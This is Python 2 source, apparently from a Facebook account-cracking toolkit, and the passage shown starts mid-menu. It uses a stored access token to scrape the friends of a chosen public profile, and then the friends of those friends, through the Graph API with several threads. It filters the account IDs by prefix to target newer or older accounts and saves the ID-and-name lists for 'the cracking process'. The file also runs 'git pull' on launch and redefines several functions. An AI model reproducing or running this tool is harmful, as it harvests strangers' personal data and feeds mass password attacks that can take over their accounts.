    print '\xe2\x94\x9c               \xe2\x94\x9c File Making Menu \xe2\x94\xa4\t         \xe2\x94\xa4'
    print '\xe2\x94\x9c               \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98                \xe2\x94\xa4'
    print '\xe2\x94\x9c [01] Auto File Making Unlimted mix idz                        \xe2\x94\xa4'
    print '\xe2\x94\x9c [02] Auto File Making New idz [79-80]                        \xe2\x94\xa4'
    print '\xe2\x94\x9c [03] Auto File Making [78-80]                   \xe2\x94\xa4'
    print '\xe2\x94\x9c [04] Auto File Making old idz [1000000-100000]               \xe2\x94\xa4'
    print '\xe2\x94\x9c [05] Auto File Making new idz [80-84]                          \xe2\x94\xa4'
    print '\xe2\x94\x9c [06] Logout From facebook               \xe2\x94\xa4'
    print '\xe2\x94\x9c [eE] Exit Program                              \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    zk = raw_input('\n \x1b[0;97m [\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] Choose An Option: ')
    if zk == '':
        print '  [!] Choose An Option'
        time.sleep(2)
        cracking_menu()
    elif zk == '1' or zk == '01':
        cuf()
    elif zk == '02' or zk == '02':
        cof()
    elif zk == '03' or zk == '03':
        caf() 
    elif zk == '04' or zk == '04':
        cgf()
    elif zk == '05' or zk == '05':
        cbf()
    elif zk == '06' or zk == '06':
        os.system('rm -f login.txt')
        zks('  \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        zmbf()
    elif zk == 'e' or zk == 'E':
        exitp()
    else:
        print '  [!] Wrong Input! Try Again'
        time.sleep(2)
        cracking_menu()


def cuf():
    os.system('clear')
    try:
        token = open('login.txt', 'r').read()
    except IOError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        os.system('clear')
        os.system('rm -rf login.txt')
        zmbf()

    print zmbflogo
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c              File Creation Menu \t         \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    idt = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Public Id: ')
    if idt == ' ' or idt == '':
        cuf()
    limit = '9999999999'
    filex = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Saving File Name: ')
    if filex == ' ' or filex == '':
        cuf()
    try:
        os.mkdir('Files')
    except:
        pass

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('.lpp').replace(' ', '_')
        yss = open(qqq, 'w')
        for i in z['friends']['data']:
            uid = i['id']
            na = i['name']
            id.append(uid + '|' + na)
            yss.write(uid + '|' + na + '\n')

        yss.close()
        pfriends = '%s' % str(len(id))
        zks('\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] Total Public Friends: %s' % len(id))
        print '\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] File Will Be Saved With The Name: Files/' + filex + '.json'
        time.sleep(1)
    except:
        pass

    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c        \xe2\x94\x9c File Creation Process Started \xe2\x94\xa4       \xe2\x94\xa4'
    print '\xe2\x94\x9c        \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98       \xe2\x94\xa4'
    print '\xe2\x94\x9c         *** Important Instructions ***         \xe2\x94\xa4'
    print '\xe2\x94\x9c * To Stop The Cracking Process Press CTRL+Z  * \xe2\x94\xa4'
    print '\xe2\x94\x9c * Idz File Will Be Saved In Files Folder     * \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c     *** Wait! Idz File Is Being Created ***    \xe2\x94\xa4\n'
    try:
        dprocess('.lpp', limit, filex)
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Public Id Not Found!'
        time.sleep(2)


def dprocess(file, lim, savefile):
    try:
        list_akun = open(file).read().splitlines()
        with zthreads(max_workers=5) as (su):
            try:
                for akun in list_akun:
                    akn = akun.split('|')
                    try:
                        su.submit(cfiles, akn[0], savefile)
                    except (KeyboardInterrupt, EOFError):
                        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Stopped! Try Again'
                        time.sleep(2)

            except (KeyError, IOError):
                print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Has Been Completed'
                time.sleep(2)

    except (KeyError, IOError):
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


def cfiles(idt, save):
    try:
        token = open('login.txt', 'r').read()
    except IOError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        os.system('clear')
        os.system('rm -rf login.txt')
        zmbf()

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('/sdcard/' + save + '.json').replace(' ', '_')
        yss = open(qqq, 'a+')
        for i in z['friends']['data']:
            uid = i['id']
            na = i['name']
            nama = i['name']
            id.append(uid + '|' + na)
            yss.write(uid + '|' + na + '\n')

        yss.close()
    except KeyError:
        pass

    try:
        pfriends = '%s' % str(len(id))
        w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
        (sys.stdout.write('\r%s[\xe2\x9e\xa5] Getting Idz From Public Friends: %s ' % (w, pfriends)),)
        sys.stdout.flush()
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Public Id Not Found!'
        time.sleep(2)


def cof():
    os.system('clear')
    print zmbflogo
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c              File Creation Menu \t         \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    idt = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Public Id: ')
    if idt == ' ' or idt == '':
        cuf(token)
    limit = '9999999999'
    filex = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Saving File Name: ')
    if filex == ' ' or filex == '':
        cuf(token)
    try:
        token = open('login.txt', 'r').read()
    except Exception as e:
        print k + '[' + p + '!' + k + ']' + p + ' Saving File Error! Try Again : %s' % e,
        time.sleep(1)
        logs()

    try:
        os.mkdir('Files')
    except:
        pass

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('.lpp').replace(' ', '_')
        yss = open(qqq, 'w')
        for i in z['friends']['data']:
            uid = i['id']
            na = i['name']
            id.append(uid + '|' + na)
            yss.write(uid + '|' + na + '\n')

        yss.close()
        old = '%s' % str(len(id))
        zks('\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] Total Public Friends: %s' % len(id))
        print '\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] File Will Be Saved With The Name: Files/' + filex + '.json'
        time.sleep(1)
    except:
        pass

    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c        \xe2\x94\x9c File Creation Process Started \xe2\x94\xa4       \xe2\x94\xa4'
    print '\xe2\x94\x9c        \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98       \xe2\x94\xa4'
    print '\xe2\x94\x9c         *** Important Instructions ***         \xe2\x94\xa4'
    print '\xe2\x94\x9c * To Stop The Cracking Process Press CTRL+Z  * \xe2\x94\xa4'
    print '\xe2\x94\x9c * Idz File Will Be Saved In Files Folder     * \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c     *** Wait! Idz File Is Being Created ***    \xe2\x94\xa4\n'
    try:
        dprocesso('.lpp', limit, filex)
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Public Id Not Found!'
        time.sleep(2)


def dprocesso(file, lim, savefile):
    try:
        list_akun = open(file).read().splitlines()
        with zthreads(max_workers=5) as (su):
            try:
                for akun in list_akun:
                    akn = akun.split('|')
                    try:
                        su.submit(cofiles, akn[0], savefile)
                    except (KeyboardInterrupt, EOFError):
                        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Stopped! Try Again'
                        time.sleep(2)

            except (KeyError, IOError):
                print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Has Been Completed'
                time.sleep(2)

    except (KeyError, IOError):
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


def cofiles(idt, save):
    try:
        token = open('login.txt', 'r').read()
    except IOError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        os.system('clear')
        os.system('rm -rf login.txt')
        zmbf()

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('/sdcard/' + save + '.json').replace(' ', '_')
        yss = open(qqq, 'a+')
        for a in z['friends']['data']:
            if a['id'][:6] in ('100079', '100080', ):
                id.append(a['id'] + '|' + a['name'])
                yss.write(a['id'] + '|' + a['name'] + '\n')

        yss.close()
    except KeyError:
        pass

    try:
        new = '%s' % str(len(id))
        w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
        (sys.stdout.write('\r%s[\xe2\x9e\xa5] Getting new Idz From Public Friends: %s ' % (w, new)),)
        sys.stdout.flush()
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


def caf():
    os.system('clear')
    print zmbflogo
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c              File Creation Menu \t         \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    idt = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Public Id: ')
    if idt == ' ' or idt == '':
        caf(token)
    limit = '9999999999'
    filex = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Saving File Name: ')
    if filex == ' ' or filex == '':
        caf(token)
    try:
        token = open('login.txt', 'r').read()
    except Exception as e:
        print k + '[' + p + '!' + k + ']' + p + ' Saving File Error! Try Again : %s' % e,
        time.sleep(1)
        logs()

    try:
        os.mkdir('Files')
    except:
        pass

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('.lpp').replace(' ', '_')
        yss = open(qqq, 'w')
        for i in z['friends']['data']:
            uid = i['id']
            na = i['name']
            id.append(uid + '|' + na)
            yss.write(uid + '|' + na + '\n')

        yss.close()
        new = '%s' % str(len(id))
        zks('\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] Total Public Friends: %s' % len(id))
        print '\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] File Will Be Saved With The Name: Files/' + filex + '.json'
        time.sleep(1)
    except:
        pass

    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c        \xe2\x94\x9c File Creation Process Started \xe2\x94\xa4       \xe2\x94\xa4'
    print '\xe2\x94\x9c        \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98       \xe2\x94\xa4'
    print '\xe2\x94\x9c         *** Important Instructions ***         \xe2\x94\xa4'
    print '\xe2\x94\x9c * To Stop The Cracking Process Press CTRL+Z  * \xe2\x94\xa4'
    print '\xe2\x94\x9c * Idz File Will Be Saved In Files Folder     * \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c     *** Wait! Idz File Is Being Created ***    \xe2\x94\xa4\n'
    try:
        dprocesso('.lpp', limit, filex)
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Public Id Not Found!'
        time.sleep(2)


def dprocesso(file, lim, savefile):
    try:
        list_akun = open(file).read().splitlines()
        with zthreads(max_workers=5) as (su):
            try:
                for akun in list_akun:
                    akn = akun.split('|')
                    try:
                        su.submit(cofiles, akn[0], savefile)
                    except (KeyboardInterrupt, EOFError):
                        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Stopped! Try Again'
                        time.sleep(2)

            except (KeyError, IOError):
                print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Has Been Completed'
                time.sleep(2)

    except (KeyError, IOError):
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


def cofiles(idt, save):
    try:
        token = open('login.txt', 'r').read()
    except IOError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        os.system('clear')
        os.system('rm -rf login.txt')
        zmbf()

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('/sdcard/' + save + '.json').replace(' ', '_')
        yss = open(qqq, 'a+')
        for a in z['friends']['data']:
            if a['id'][:6] in ('100078', '100079','100080', ):
                id.append(a['id'] + '|' + a['name'])
                yss.write(a['id'] + '|' + a['name'] + '\n')

        yss.close()
    except KeyError:
        pass

    try:
        new = '%s' % str(len(id))
        w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
        (sys.stdout.write('\r%s[\xe2\x9e\xa5] Getting new Idz From Public Friends: %s ' % (w, new)),)
        sys.stdout.flush()
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


def cgf():
    os.system('clear')
    print zmbflogo
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c              File Creation Menu \t         \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    idt = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Public Id: ')
    if idt == ' ' or idt == '':
        cgf(token)
    limit = '9999999999'
    filex = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Saving File Name: ')
    if filex == ' ' or filex == '':
        cgf(token)
    try:
        token = open('login.txt', 'r').read()
    except Exception as e:
        print k + '[' + p + '!' + k + ']' + p + ' Saving File Error! Try Again : %s' % e,
        time.sleep(1)
        logs()

    try:
        os.mkdir('Files')
    except:
        pass

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('.lpp').replace(' ', '_')
        yss = open(qqq, 'w')
        for i in z['friends']['data']:
            uid = i['id']
            na = i['name']
            id.append(uid + '|' + na)
            yss.write(uid + '|' + na + '\n')

        yss.close()
        old = '%s' % str(len(id))
        zks('\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] Total Public Friends: %s' % len(id))
        print '\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] File Will Be Saved With The Name: Files/' + filex + '.json'
        time.sleep(1)
    except:
        pass

    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c        \xe2\x94\x9c File Creation Process Started \xe2\x94\xa4       \xe2\x94\xa4'
    print '\xe2\x94\x9c        \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98       \xe2\x94\xa4'
    print '\xe2\x94\x9c         *** Important Instructions ***         \xe2\x94\xa4'
    print '\xe2\x94\x9c * To Stop The Cracking Process Press CTRL+Z  * \xe2\x94\xa4'
    print '\xe2\x94\x9c * Idz File Will Be Saved In Files Folder     * \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c     *** Wait! Idz File Is Being Created ***    \xe2\x94\xa4\n'
    try:
        dprocesso('.lpp', limit, filex)
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Public Id Not Found!'
        time.sleep(2)


def dprocesso(file, lim, savefile):
    try:
        list_akun = open(file).read().splitlines()
        with zthreads(max_workers=5) as (su):
            try:
                for akun in list_akun:
                    akn = akun.split('|')
                    try:
                        su.submit(cofiles, akn[0], savefile)
                    except (KeyboardInterrupt, EOFError):
                        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Stopped! Try Again'
                        time.sleep(2)

            except (KeyError, IOError):
                print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Has Been Completed'
                time.sleep(2)

    except (KeyError, IOError):
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


def cofiles(idt, save):
    try:
        token = open('login.txt', 'r').read()
    except IOError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        os.system('clear')
        os.system('rm -rf login.txt')
        zmbf()

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('/sdcard/' + save + '.json').replace(' ', '_')
        yss = open(qqq, 'a+')
        for a in z['friends']['data']:
            if a['id'][:7] in ('1000000', '100000', ):
                id.append(a['id'] + '|' + a['name'])
                yss.write(a['id'] + '|' + a['name'] + '\n')

        yss.close()
    except KeyError:
        pass

    try:
        old = '%s' % str(len(id))
        w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
        (sys.stdout.write('\r%s[\xe2\x9e\xa5] Getting old Idz From Public Friends: %s ' % (w, old)),)
        sys.stdout.flush()
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


def cbf():
    os.system('clear')
    print zmbflogo
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c              File Creation Menu \t         \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    idt = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Public Id: ')
    if idt == ' ' or idt == '':
        cbf(token)
    limit = '9999999999'
    filex = raw_input('\x1b[0;97m[\x1b[0;92m\xe2\x9e\xa3\x1b[0;97m] Enter Saving File Name: ')
    if filex == ' ' or filex == '':
        cbf(token)
    try:
        token = open('login.txt', 'r').read()
    except Exception as e:
        print k + '[' + p + '!' + k + ']' + p + ' Saving File Error! Try Again : %s' % e,
        time.sleep(1)
        logs()

    try:
        os.mkdir('Files')
    except:
        pass

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('.lpp').replace(' ', '_')
        yss = open(qqq, 'w')
        for i in z['friends']['data']:
            uid = i['id']
            na = i['name']
            id.append(uid + '|' + na)
            yss.write(uid + '|' + na + '\n')

        yss.close()
        old = '%s' % str(len(id))
        zks('\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] Total Public Friends: %s' % len(id))
        print '\x1b[0;97m[\x1b[0;97m\xe2\x9e\xa3\x1b[0;97m] File Will Be Saved With The Name: Files/' + filex + '.json'
        time.sleep(1)
    except:
        pass

    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c        \xe2\x94\x9c File Creation Process Started \xe2\x94\xa4       \xe2\x94\xa4'
    print '\xe2\x94\x9c        \xe2\x94\x94\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x98       \xe2\x94\xa4'
    print '\xe2\x94\x9c         *** Important Instructions ***         \xe2\x94\xa4'
    print '\xe2\x94\x9c * To Stop The Cracking Process Press CTRL+Z  * \xe2\x94\xa4'
    print '\xe2\x94\x9c * Idz File Will Be Saved In Files Folder     * \xe2\x94\xa4'
    print '\x1b[0;97m\xe2\x94\x94' + 48 * '\xe2\x94\x80' + '\xe2\x94\x98'
    print '\x1b[0;97m\xe2\x94\x8c' + 48 * '\xe2\x94\x80' + '\xe2\x94\x90'
    print '\xe2\x94\x9c     *** Wait! Idz File Is Being Created ***    \xe2\x94\xa4\n'
    try:
        dprocesso('.lpp', limit, filex)
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Public Id Not Found!'
        time.sleep(2)


def dprocesso(file, lim, savefile):
    try:
        list_akun = open(file).read().splitlines()
        with zthreads(max_workers=5) as (su):
            try:
                for akun in list_akun:
                    akn = akun.split('|')
                    try:
                        su.submit(cofiles, akn[0], savefile)
                    except (KeyboardInterrupt, EOFError):
                        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Stopped! Try Again'
                        time.sleep(2)

            except (KeyError, IOError):
                print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Has Been Completed'
                time.sleep(2)

    except (KeyError, IOError):
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


def cofiles(idt, save):
    try:
        token = open('login.txt', 'r').read()
    except IOError:
        zks(' \x1b[0;97m[\x1b[0;91m!\x1b[0;97m] Removing Token..! Login Again')
        os.system('clear')
        os.system('rm -rf login.txt')
        zmbf()

    r = requests.get('https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s' % (idt, token))
    z = json.loads(r.text)
    try:
        qqq = ('/sdcard/' + save + '.json').replace(' ', '_')
        yss = open(qqq, 'a+')
        for a in z['friends']['data']:
            if a['id'][:6] in ('100080', '100081', '100082','100083','100084', ):
                id.append(a['id'] + '|' + a['name'])
                yss.write(a['id'] + '|' + a['name'] + '\n')

        yss.close()
    except KeyError:
        pass

    try:
        new = '%s' % str(len(id))
        w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
        (sys.stdout.write('\r%s[\xe2\x9e\xa5] Getting new Idz From Public Friends: %s ' % (w, new)),)
        sys.stdout.flush()
    except Exception as e:
        print '\x1b[0;97m[\x1b[0;91m!\x1b[0;97m] File Creation Failed! Try Again'
        time.sleep(2)


if __name__ == '__main__':
    os.system('git pull')
    cracking_menu()

